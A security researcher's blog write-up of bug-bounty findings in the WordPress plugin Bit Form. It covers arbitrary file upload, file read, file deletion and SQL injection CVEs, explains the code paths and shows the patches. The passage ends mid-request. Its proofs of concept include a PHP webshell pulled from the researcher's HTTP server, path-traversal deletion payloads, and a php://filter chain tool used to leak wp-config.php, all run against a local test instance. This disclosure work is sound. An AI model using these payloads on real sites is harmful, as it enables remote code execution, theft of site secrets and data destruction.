siunam's Website

My personal website

Home Writeups Research Blog Projects About

How I Found My First Vulnerabilities In 6 Different WordPress Plugins (Part 1)

Table of Contents

Overview

This writeup is about how I found my first real world vulnerabilities across 6 different WordPress plugins. In the first part, I'll mainly talk about 7 vulnerabilities that I've found in WordPress plugin "Bit Form", 1 of which was duplicated. In the second part, I'll share some common pitfalls in using a PHP library, which eventually led me to find exactly the same vulnerabilities in 5 different WordPress plugins that use the same PHP library.

In this first part, I'll talk about how I found the following vulnerabilities in details:

  1. *Authenticated (Administrator+) Arbitrary File Upload (CVE-2024-6123)
  2. Authenticated (Administrator+) Improper Input Validation via iconUpload Function to Arbitrary File Read (CVE-2024-9507)
  3. Authenticated (Administrator+) Arbitrary File Deletion (CVE-2024-7782)
  4. Authenticated (Administrator+) Arbitrary File Read And Deletion (CVE-2024-7777)
  5. Authenticated (Administrator+) SQL Injection (CVE-2024-7780)
  6. Authenticated (Administrator+) SQL Injection via getLogHistory Function (CVE-2024-7702)
  7. Authenticated (Administrator+) Arbitrary JavaScript File Uploads (CVE-2024-7775)

* This vulnerability was first found by researcher István Márton, then I later discovered this vulnerability.

Without further ado, let's dive in!

Before Doing WordPress Plugin Bug Bounty

After me and my teammates in ARESx solving NahamCon CTF 2024 a challenge called "WP Elevator" (Writeup here), I was very curious about WordPress plugins security ecosystem. Upon researching, I found that Patchstack and Wordfence do have a bug bounty program for WordPress plugins and themes. Eventually in June 4th 2024, I posted this Tweet and decided to hunt for vulnerabilities in WordPress plugins.

And of course, same as many beginners, I failed to find any vulnerabilities in 5 different plugins. Luckily, in around June 12th, Wordfence introduced the "0-day Threat Hunt", which means high severity vulnerabilities in plugins and themes with more than 1000 active installations are considered to be in-scope:

In Wordfence bug bounty program, there are 3 researcher tiers: "Standard Researchers", "Resourceful Researchers", and "1337 Researchers". Those tiers can be achieved by finding certain amounts of vulnerabilities or achieve a certain goal. For new starters, all of us are in tier "Standard Researchers". Before the "0-day Threat Hunt", normally only plugins/themes with more than 50000 active installations are in-scope targets. Lucky for me, it's not the case anymore! I can now start to hunt for vulnerabilities with a wider scope!

In July 2nd, I picked a plugin called "Bit Form", which at the time of writing this writeup, it has 6000+ active installations and the latest version is 2.13.0. Then, as usual, I started to perform code review and hunt for bugs, just like how I solve a CTF web challenge!

Authenticated (Administrator+) Arbitrary File Upload (CVE-2024-6123)

After poking around with this plugin, building forms, I slowly understood some features in the plugin. I then started one of my code review techniques: "Sources and sinks model", where sources are user inputs, and sinks are dangerous functions.

Now you may ask: What are the dangerous functions in PHP and WordPress plugin?

Fortunately, researcher István Márton posted a Discord message that contains some common sinks:

Nice! We can now search for common sinks!

Note: I might post a version of mine for common sources and sinks if time is allowed!

After searching for sinks in LFI (Local File Inclusion) vulnerability, no luck. I then proceed to find sinks in arbitrary file upload vulnerabilities. Eventually, I found class AdminAjax public method iconUpload:

At the first glance, it seems like it doesn't have any protection to against users to upload arbitrary PHP files:

class AdminAjax
{
  [...]
  public function iconUpload()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $uploadDirInfo = wp_upload_dir();
      $wpUploadbaseDir = $uploadDirInfo['basedir'];
      $icnDir = $wpUploadbaseDir . DIRECTORY_SEPARATOR . 'bitforms' . DIRECTORY_SEPARATOR . 'icons';
      [...]
      $imageUrlData = file_get_contents($input->src);

      $filename = sanitize_file_name($input->id . '-' . basename($input->src));
      $uploaded = file_put_contents($icnDir . '/' . $filename, $imageUrlData);

      if ($uploaded) {
        $uploadedFile = BITFORMS_UPLOAD_BASE_URL . '/' . 'icons' . '/' . $filename;
        wp_send_json_success($uploadedFile, 200);
      }
    } else {
      [...]
    }
  }

As you can see, after verifying our nonce, our source $input->src is parsed to the PHP built-in function file_get_contents to fetch a remote resource. After reading the remote resource's contents, it'll parse the content to another PHP built-in function file_put_contents, which means the content will be written to path /wp-content/uploads/bitforms/icons/<filename>.

Since there's no validation to only allow image files to be written to the icons directory, we can literally use this method to fetch a remote resource that contains PHP code, and then write that PHP code into the icons directory.

But wait! How can we call this method?

If we search for iconUpload, we can see that AJAX action bitforms_icn_save_setting has this callback method:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_icn_save_setting', [$this, 'iconUpload']);

With that said, we can call this AJAX action with a valid nonce to upload arbitrary files!

Now, how can we generate a valid nonce that binds to action bitforms_save?

To find out, we can search for bitforms_save and we should be able to find this in /wp-content/plugins/bit-form/includes/Admin/Admin_Bar.php:

class Admin_Bar
{
  [...]
  public function AdminAssets($current_screen)
  {
    [...]
    if (!defined('BITAPPS_DEV') || (defined('BITAPPS_DEV') && !BITAPPS_DEV)) {
      $build_hash = file_get_contents(BITFORMS_PLUGIN_DIR_PATH . '/build-hash.txt');
      wp_enqueue_script('index-BITFORM-MODULE', BITFORMS_ASSET_URI . "/main-{$build_hash}.js", [], null);
      wp_enqueue_style('bf-css', BITFORMS_ASSET_URI . "/main-{$build_hash}.css");
    }
    [...]
    $bits = [
      [...]
      'nonce'               => wp_create_nonce('bitforms_save'),
      [...]
    ]
    [...]
    $bitforms = apply_filters(
      'bitforms_localized_script',
      $bits
    );
    [...]
    wp_localize_script('index-BITFORM-MODULE', 'bits', $bitforms);

In here, we can see that class Admin_Bar public method AdminAssets uses WordPress function wp_enqueue_script to register a JavaScript file, and its handle is called index-BITFORM-MODULE. In this JavaScript, it contains a new nonce that binds to action bitforms_save, which is generated via wp_create_nonce.

Again, tracing back how this method is being called, we can find that this is the callback method of action admin_enqueue_scripts:

class Admin_Bar
{
  public function register()
  {
    [...]
    add_action('admin_enqueue_scripts', [$this, 'AdminAssets']);
  }

If we read the documentation of WordPress hook admin_enqueue_scripts, it says "Fires when enqueuing scripts for all admin pages."

Again, tracing back how this public method register is being called, we can find that this method is called via class Hooks public method init_classes:

[...]
use BitCode\BitForm\Core\Capability\Request;
[...]

class Hooks
{
  [...]
  public static function init_classes()
  {
    if (Request::Check('admin')) {
      (new Admin_Bar())->register();
    }
    [...]
  }

Eventually, we'll find that we can get a valid nonce in the Bit Form admin page:

Nice! We can now test for it!

First, we host a PHP webshell file via Python module http.server:

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-upload)-[2024.08.21|20:48:30(HKT)]
└> ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.69.96.69  netmask 255.255.255.0  broadcast 10.69.96.255
        [...]
┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-upload)-[2024.08.21|20:48:32(HKT)]
└> echo -n '<?php system($_GET["cmd"]); ?>' > webshell.php
┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-upload)-[2024.08.21|20:48:52(HKT)]
└> python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Then, send a POST request to /wp-admin/admin-ajax.php with GET parameter action, _ajax_nonce, and JSON object attribute src that points to our HTTP server:

POST /wp-admin/admin-ajax.php?action=bitforms_icn_save_setting&_ajax_nonce=5bb5d043b8 HTTP/1.1
Host: localhost
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724412605%7CrwbMC64aqDEgN54rhgVKKkWAMiTmYSeFVF3Krk8UlPK%7C74a392fa0d19e2134f69822e321e4ce34145356de815964c65020c6715df5d13; wp-settings-time-1=1724241516; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724412605%7CrwbMC64aqDEgN54rhgVKKkWAMiTmYSeFVF3Krk8UlPK%7C392d7068610920f89b32627fd8b31d70e308941a8f8c15ed2a6d9aff0923c958
Content-Type: text/plain;charset=UTF-8
Content-Length: 46

{"src":"http://10.69.96.69:8000/webshell.php"}

Finally, we should be able to execute OS commands in our uploaded PHP webshell file!

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-upload)-[2024.08.21|20:51:09(HKT)]
└> curl --get http://localhost/wp-content/uploads/bitforms/icons/webshell.php --data-urlencode "cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nice!!

Unfortunately, this vulnerability is out-of-scope, as it requires administrator+ privilege to exploit it. I tried to find all possible ways to exploit it in an unauthenticated/low privilege users, but no luck. After writing the Proof-of-Concept script, I reported this vulnerability to Wordfence in July 3rd, 2024 at 5:22 PM (UTC+8).

After 6 hours of reporting, I was notified by Wordfence that this vulnerability had been found by researcher István Márton and treated this report as duplicate. Ah, darn it! Let's move on and keep finding even more vulnerabilities!

The Patch

To fix this vulnerability is very straight forward. Just validate the remote fetched resource's extension is an image and MIME type is image/.*.

Based on the version 2.13.4 revision log, we can see now the method is validating the extension and MIME type of the remote resource via WordPress function wp_check_filetype:

class AdminAjax
{
  [...]
  public function iconUpload()
  {
    [...]
    $validation = wp_check_filetype($filename);
    $type = $validation['type'];

    if ($type && 0 === strpos($type, 'image/')) {
      $uploaded = file_put_contents($icnDir . '/' . $filename, $imageUrlData);
      [...]
    } else {
      [...]
    }

Note: WordPress function wp_check_filetype also check whether the file extension matches the MIME type. If it's not match, both array type and ext will return false. You can check it out in the documentation's "Source" section.

Timeline

Authenticated (Administrator+) Improper Input Validation via iconUpload Function to Arbitrary File Read (CVE-2024-9507)

During writing this writeup, I realized that method iconUpload is actually vulnerable to arbitrary file read. More specifically, it's the following line:

class AdminAjax
{
  [...]
  public function iconUpload()
  {
    [...]
    $imageUrlData = file_get_contents($input->src);

Did you spot the vulnerability in here? :D

If you played CTF long enough and solved tons of web challenges, you should know that PHP has something called "wrapper".

If there's a PHP built-in function that reads a file, such as file_get_contents, and has no validation in the filename, we can use PHP wrapper to read arbitrary files or even RCE (Remote Code Execution).

In one of many PHP wrappers, we can use php://filter to perform basic modification operations on the data before being it's read or written. For example, we can base64 encode the contents of /etc/passwd:

echo file_get_contents("php://filter/convert.base64-encode/resource=file:///etc/passwd");
┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-read)-[2024.08.21|23:04:25(HKT)]
└> php -a                       
[...]
php > echo file_get_contents("php://filter/convert.base64-encode/resource=file:///etc/passwd");
cm9vdDp4OjA6MDpyb290Oi9yb290[...]

Now you might be saying: Let's use this PHP wrapper to read arbitrary files!

Well, nope. You can't read the contents of the file by copying it to a readable path (/wp-content/uploads/bitforms/icons/<filename>). This is because the file validation will NOT pass.

Note: Before version 2.13.4, we can read the contents of the file, because there's no file validation.

Plus, the contents of the file is NOT being displayed via echo or other functions.

Hmm… Is this a deadend?

In 0xL4ugh CTF 2024, I solved a web challenge called "Ghazy Corp" (Writeup here). The solution of this challenge is to use PHP filter chain to leak the file contents via error-based oracle.

For more details about this technique, I strongly recommend you to read this blog post by Synacktiv: "PHP filter chains: file read from error-based oracle".

In their blog post, Synacktiv also developed a tool to automate the exploitation, which can be found at this GitHub repository: https://github.com/synacktiv/php_filter_chains_oracle_exploit.

Let's download that tool!

┌[siunam♥Mercury]-(/opt)-[2024.08.21|23:33:39(HKT)]
└> git clone https://github.com/synacktiv/php_filter_chains_oracle_exploit.git
[...]
┌[siunam♥Mercury]-(/opt)-[2024.08.21|23:33:42(HKT)]
└> cd php_filter_chains_oracle_exploit  

After that, we can run the tool with the following arguments:

┌[siunam♥Mercury]-(/opt/php_filter_chains_oracle_exploit)-[2024.08.21|23:34:01(HKT)]-[git://main ✔]
└> python3 filters_chain_oracle_exploit.py --target 'http://localhost/wp-admin/admin-ajax.php?action=bitforms_icn_save_setting&_ajax_nonce=7c14a2c9d5' --file '/var/www/html/wp-config.php' --parameter 'src' --headers '{"Cookie":"wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724424200%7C8f5DffgMa2AgY0yHu5EHCtd85HC9isw6wSaUek2PNYQ%7C92130fb11ce849391025a7643e2dbadf0cbe5db86d2a6f0f6d777f32ef48979a; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724424200%7C8f5DffgMa2AgY0yHu5EHCtd85HC9isw6wSaUek2PNYQ%7C4aa1c62128cd84c74d39d58b8e003f84e3ed72b9c27be1724b13d6e02b195800"}' --json=1
[*] The following URL is targeted : http://localhost/wp-admin/admin-ajax.php?action=bitforms_icn_save_setting&_ajax_nonce=7c14a2c9d5
[*] The following local file is leaked : /var/www/html/wp-config.php
[*] Running POST requests
[*] Additionnal headers used : {"Cookie":"wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724424200%7C8f5DffgMa2AgY0yHu5EHCtd85HC9isw6wSaUek2PNYQ%7C92130fb11ce849391025a7643e2dbadf0cbe5db86d2a6f0f6d777f32ef48979a; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724424200%7C8f5DffgMa2AgY0yHu5EHCtd85HC9isw6wSaUek2PNYQ%7C4aa1c62128cd84c74d39d58b8e003f84e3ed72b9c27be1724b13d6e02b195800"}
PD9waHANCi8qKg0KICogVGh
b'<?php\r\n/**\r\n * Th'

Note: A video showcase can be seen in here.

Nice! We found an arbitrary file read vulnerability! Let's report this!

The Patch

Again, the fix is very simple, just validate the src JSON value to be a legit URL, such as not allowing the URL uses a PHP wrapper as the protocol.

We can see that version 2.15.3 revision log uses WordPress function sanitize_url to accept a list of allowed protocols:

class AdminAjax
{
  [...]
  public function iconUpload()
  {
    [...]
    $sanitize_url = sanitize_url($input->src);
    [...]
    $imageUrlData = file_get_contents($sanitize_url);

Timeline

Authenticated (Administrator+) Arbitrary File Deletion (CVE-2024-7782)

After finding an arbitrary file upload vulnerability, I decided to look for arbitrary file deletion. As usual, I searched for common sinks for file deletion, such as unlink(), wp_delete_file().

Well surprise, there's an unlink() sink literally 2 methods below iconUpload. That method is called iconRemove!

class AdminAjax
{
  [...]
  public function iconRemove()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);

      $uploadDirInfo = wp_upload_dir();

      $wpUploadbaseDir = $uploadDirInfo['basedir'];
      $icnDir = $wpUploadbaseDir . DIRECTORY_SEPARATOR . 'bitforms' . DIRECTORY_SEPARATOR . 'icons' . DIRECTORY_SEPARATOR;
      if (file_exists($icnDir . $input->file)) {
        unlink($icnDir . $input->file);
        wp_send_json_success($this->getFiles(), 200);
      }
    } else {
      [...]
    }
  }

In here, the sink is unlink(), which allows this method to delete a file. Then, the source is our JSON attribute value file. Since there's no sanitization over the file value, we can perform path traversal to delete any files on the file system!

By searching the method name, we can know that this method was used in AJAX action bitforms_icon_remove:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_icon_remove', [$this, 'iconRemove']);

With that said, once we have a valid nonce, we can delete any files on the file system!

Let's try that!

First, create a test file in the Docker container:

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-delete)-[2024.08.22|16:30:16(HKT)]
└> docker container list                                            
CONTAINER ID   IMAGE                               COMMAND                  CREATED          STATUS          PORTS                                                                                  NAMES
9e2f4f189063   wordpress-local-testing-wordpress   "docker-entrypoint.s…"   39 minutes ago   Up 39 minutes   0.0.0.0:80->80/tcp, :::80->80/tcp                                                      wordpress-wpd
[...]
┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-delete)-[2024.08.22|16:30:16(HKT)]
└> docker exec -it 9e2f4f189063 bash
root@9e2f4f189063:/var/www/html# echo -n 'test' > test.txt
root@9e2f4f189063:/var/www/html# chown www-data:www-data test.txt
root@9e2f4f189063:/var/www/html# ls -lah test.txt 
-rw-r--r-- 1 www-data www-data 4 Aug 22 08:31 test.txt

Then, send the following POST request to /wp-admin/admin-ajax.php:

POST /wp-admin/admin-ajax.php?action=bitforms_icon_remove&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 65
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"file":"../../../../../../../../../../../var/www/html/test.txt"}

Now the test file should be deleted, right?

root@9e2f4f189063:/var/www/html# ls -lah test.txt 
-rw-r--r-- 1 www-data www-data 4 Aug 22 08:31 test.txt

Huh? It's still there?

Let's take a step back and take a look at the full path.

In the iconRemove method, the $icnDir is constructed like this:

$uploadDirInfo = wp_upload_dir();

$wpUploadbaseDir = $uploadDirInfo['basedir'];
$icnDir = $wpUploadbaseDir . DIRECTORY_SEPARATOR . 'bitforms' . DIRECTORY_SEPARATOR . 'icons' . DIRECTORY_SEPARATOR;

In WordPress function wp_upload_dir, it returns the current upload directory’s path and URL. Usually it's at /var/www/html/wp-content/uploads/<current_year>/<current_month>. After getting the WordPress upload directory path, it takes the basedir of wp_upload_dir, which is /var/www/html/wp-content/uploads/, and append it with DIRECTORY_SEPARATOR . 'bitforms' . DIRECTORY_SEPARATOR . 'icons' . DIRECTORY_SEPARATOR. According to PHP Predefined Constants, the DIRECTORY_SEPARATOR means string / on Linux and \ on Windows.

Hence, the final constructed path in $icnDir is /var/www/html/wp-content/uploads/bitforms/icons/.

Now, if we look at directory /var/www/html/wp-content/uploads/bitforms/, the icons directory doesn't exist by default!

root@9e2f4f189063:/var/www/html# ls -lah wp-content/uploads/bitforms/
total 20K
drwxr-xr-x 4 www-data www-data 4.0K Aug 22 08:21 .
drwxr-xr-x 5 www-data www-data 4.0K Aug 22 08:21 ..
drwxr-xr-x 2 www-data www-data 4.0K Aug 22 08:26 form-styles
-rw-r--r-- 1 www-data www-data    6 Aug 22 08:21 index.php
drwxr-xr-x 3 www-data www-data 4.0K Aug 22 08:26 uploads

Hmm… It actually makes sense why we can't delete any files using path traversal, because the icons directory doesn't exist. Since the directory doesn't exist, Linux can't resolve the real path of the file. We can try that:

root@9e2f4f189063:/var/www/html# rm /var/www/html/doesnt_exist/../test.txt
rm: cannot remove '/var/www/html/doesnt_exist/../test.txt': No such file or directory

Huh, okay. Are there any ways to create directory icons at path /var/www/html/wp-content/uploads/bitforms/?

Well, yes there's a way to create that directory!

If we look back to method iconUpload, we can see the following lines:

class AdminAjax
{
  [...]
  public function iconUpload()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      [...]
      $uploadDirInfo = wp_upload_dir();
      $wpUploadbaseDir = $uploadDirInfo['basedir'];
      $icnDir = $wpUploadbaseDir . DIRECTORY_SEPARATOR . 'bitforms' . DIRECTORY_SEPARATOR . 'icons';
      if (!is_dir($icnDir)) {
        mkdir($icnDir);
      }

As you can see, if directory $icnDir doesn't exist, it'll create that directory using PHP built-in function mkdir. Nice!

With that being said, we can first create directory icons using method iconUpload, then delete any files via method iconRemove.

Let's test it again!

POST /wp-admin/admin-ajax.php?action=bitforms_icn_save_setting&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 65
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"src":"anything"}

POST /wp-admin/admin-ajax.php?action=bitforms_icon_remove&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 65
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"file":"../../../../../../../../../../../var/www/html/test.txt"}

root@9e2f4f189063:/var/www/html# ls -lah test.txt 
ls: cannot access 'test.txt': No such file or directory

Let's go!

The Patch

Based on the version 2.13.5 revision log, we can see now the method is sanitizing the file JSON attribute value via WordPress function sanitize_file_name:

class AdminAjax
{
  [...]
  public function iconRemove()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      [...]
      $sanitizeFileName = sanitize_file_name($input->file);
      $filePath = $icnDir . $sanitizeFileName;
      if (file_exists($filePath)) {
        wp_delete_file($filePath);
        wp_send_json_success($this->getFiles(), 200);
      }
    } else {
      [...]
    }
  }

Timeline

Authenticated (Administrator+) Arbitrary File Read And Deletion (CVE-2024-7777)

After reported the arbitrary file upload and deletion in iconUpload and iconRemove, I decided to find another file delete and read sinks. Ultimately, I found 4 methods in class AdminFormHandler that used a sink, which were deleteBlukFormEntries, deleteBlukForm, deleteAForm, and duplicateFormEntry.

Arbitrary File Deletion

Let's talk about arbitrary file deletion first.

If we search for arbitrary file deletion sinks, such as unlink, we'll find class FileHandler method rmrf:

final class FileHandler
{
  public function rmrf($dir)
  {
    if (is_dir($dir)) {
      $objects = scandir($dir);
      foreach ($objects as $object) {
        if ('.' !== $object && '..' !== $object) {
          if (is_dir($dir . DIRECTORY_SEPARATOR . $object) && !is_link($dir . DIRECTORY_SEPARATOR . $object)) {
            $this->rmrf($dir . DIRECTORY_SEPARATOR . $object);
          } else {
            unlink($dir . DIRECTORY_SEPARATOR . $object);
          }
        }
      }
      rmdir($dir);
    } else {
      unlink($dir);
    }
  }

As the method name suggested, it's similar to the Linux's rm -rf command, which recursively deletes files.

With that being said, let's search where does this method is being used.

If we search for method rmrf, we'll find that it has been used in 3 different methods in class AdminFormHandler, which were: deleteBlukFormEntries, deleteBlukForm, and deleteAForm.

Arbitrary File Deletion via Method deleteBlukFormEntries

class AdminFormHandler
{
  [...]
  public function deleteBlukFormEntries($Request, $post)
  {
    if (isset($Request['formID'])) {
      $formID = wp_unslash($Request['formID']);
      $entries = wp_unslash($Request['entries']);
    } else {
      $formID = wp_unslash($post->formID);
      $entries = wp_unslash($post->entries);
    }
    if (is_null($formID) || !is_array($entries) || 0 === count($entries)) {
      return new WP_Error('empty_form', __('Invalid Form ID or Entries ID.', 'bit-form'));
    }
    $formManager = new AdminFormManager($formID);
    if (!$formManager->isExist()) {
      return new WP_Error('empty_form', __('Form does not exist.', 'bit-form'));
    }
    [...]
    if (file_exists(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID)) {
      $fileHandler = new FileHandler();
      foreach ($entries as $enrtyKey => $entryID) {
        $fileEntries = BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID . DIRECTORY_SEPARATOR . $entryID;
        if (file_exists($fileEntries)) {
          $fileHandler->rmrf($fileEntries);
        }
      }
    }
    [...]
  }

As you can see, if the source formID form exist, it'll call method rmrf to delete everything inside the formID directory.

Hmm… If we can control formID and entryID, we could try to do a path traversal to delete any files in the file system!

By tracing back how this method deleteBlukFormEntries is being called, we'll find that it's from class AdminAjax method deleteBlukFormEntries. (Yes, they have the same method name):

class AdminAjax
{
  [...]
  public function deleteBlukFormEntries()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->deleteBlukFormEntries($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

Which again, it's used by AJAX action bitforms_bulk_delete_form_entries:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_bulk_delete_form_entries', [$this, 'deleteBlukFormEntries']);

Just like the previous vulnerabilities, the source is our POST request's JSON body data. Therefore, we can provide a valid formID and with a path traversal payload in array entries to delete arbitrary files.

Note: Class AdminFormHandler method deleteBlukFormEntries also validate the entries must be an array.

Now, how can we create a form?

If we go to the Bit Form plugin page, we can click the "Create First Form" button to create a new blank form:

Burp Suite HTTP history:

After clicking the button, it'll send AJAX action bitforms_create_new_form to create a new form. If the form created successfully, it returns the form ID in object data attribute id.

Now that we have a valid form, let's try to delete a test file:

root@9e2f4f189063:/var/www/html# echo -n 'test' > test.txt
root@9e2f4f189063:/var/www/html# chown www-data:www-data test.txt
root@9e2f4f189063:/var/www/html# ls -lah test.txt
-rw-r--r-- 1 www-data www-data 4 Aug 22 11:09 test.txt
POST /wp-admin/admin-ajax.php?action=bitforms_bulk_delete_form_entries&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 30
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"formID":"1","entries":["../../../../../../../../../../../../../var/www/html/test.txt"]}

root@9e2f4f189063:/var/www/html# ls -lah test.txt 
ls: cannot access 'test.txt': No such file or directory

Nice! It worked! Now let's move onto the next method!

Arbitrary File Deletion via Method deleteBlukForm

  public function deleteBlukForm($Request, $post)
  {
    if (isset($Request['formID'])) {
      $formID = wp_unslash($Request['formID']);
    } else {
      $formID = wp_unslash($post->formID);
    }
    if (is_null($formID) || !is_array($formID)) {
      return new WP_Error('empty_form', __('Form id is empty.', 'bit-form'));
    }
    $cssPath = BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR;
    foreach ($formID as $id) {
      unlink($cssPath . 'bitform-' . $id . '.css');
      if (file_exists($cssPath . 'bitform-layout-' . $id . '.css')) {
        unlink($cssPath . 'bitform-layout-' . $id . '.css');
      }
      if (file_exists($cssPath . 'bitform-' . $id . '-formid' . '.css')) {
        unlink($cssPath . 'bitform-' . $id . '-formid' . '.css');
      }
    }
    [...]
    $fileHandler = new FileHandler();
    foreach ($formID as $fId) {
      if (file_exists(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $fId)) {
        $fileHandler->rmrf(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $fId);
      }
      [...]
    }
    [...]
  }

In here, we have the source formID. After checking the formID must be an array, it'll delete CSS files using PHP built-in function unlink and everything inside the formID directory.

Just like the previous one, this method is used by class AdminAjax method deleteBlukForm, which is also used by AJAX action bitforms_bulk_delete_form:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_bulk_delete_form', [$this, 'deleteBlukForm']);
    [...]
  }
  [...]
  public function deleteBlukForm()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->deleteBlukForm($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

However, this time, unlike the previous one, we don't need a valid formID, as it doesn't check the formID is belonged to a legit form.

Now, let's test it!

First, create a test file:

root@9e2f4f189063:/var/www/html# echo -n 'test' > test.txt
root@9e2f4f189063:/var/www/html# chown www-data:www-data test.txt
root@9e2f4f189063:/var/www/html# ls -lah test.txt 
-rw-r--r-- 1 www-data www-data 4 Aug 22 11:35 test.txt

Then, send the following POST request:

POST /wp-admin/admin-ajax.php?action=bitforms_bulk_delete_form&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 89
